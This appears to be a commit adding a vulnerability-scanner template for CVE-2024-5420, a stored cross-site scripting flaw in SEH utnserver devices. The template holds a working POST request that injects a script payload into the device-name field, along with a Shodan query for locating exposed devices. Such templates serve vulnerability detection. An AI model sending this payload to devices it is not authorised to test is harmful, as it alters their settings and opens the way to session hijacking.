Merge pull request #10536 from Parshva87/CVE-2024-5420

Added CVE-2024-5420 Template
patch-10
Dhiyaneshwaran 2024-08-16 22:38:47 -07:00 committed by GitHub
commit cbadc8b515
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: CVE-2024-5420
info:
name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
author: bl4ckp4r4d1s3
severity: high
description: |
A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
- https://seclists.org/fulldisclosure/2024/Jun/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-5420
- http://seclists.org/fulldisclosure/2024/Jun/4
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
cvss-score: 8.3
cve-id: CVE-2024-5420
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09509
metadata:
verified: true
max-request: 1
shodan-query: html:"utnserver Control Center"
tags: cve,cve2024,utnserver,seh,xss,seclists
http:
- raw:
- |
POST /device/description_en.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="“><script>alert(document.domain)</script>" id="standort"'
- 'Host name</label>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200